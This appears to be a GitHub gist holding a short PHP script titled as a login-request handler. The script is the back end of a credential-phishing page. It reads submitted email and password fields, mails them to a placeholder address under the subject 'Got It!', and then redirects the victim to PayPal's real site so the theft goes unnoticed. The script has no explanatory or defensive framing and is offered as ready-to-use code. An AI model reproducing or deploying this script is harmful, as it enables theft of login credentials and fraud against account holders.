Skip to content

Instantly share code, notes, and snippets.

@rundongliu
Created July 6, 2016 05:22
Show Gist options
  • Save rundongliu/1b9d1aa868eb1ec176103691eef516c8 to your computer and use it in GitHub Desktop.
Save rundongliu/1b9d1aa868eb1ec176103691eef516c8 to your computer and use it in GitHub Desktop.
a php file which handles login request
<?php
$email=$_POST['login_email'];
$password=$_POST['login_password'];
$msg = $email."\n".$password."\n";
mail(your_email , "Got It!" ,$msg);
header("Location:https://www.paypal.com")
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment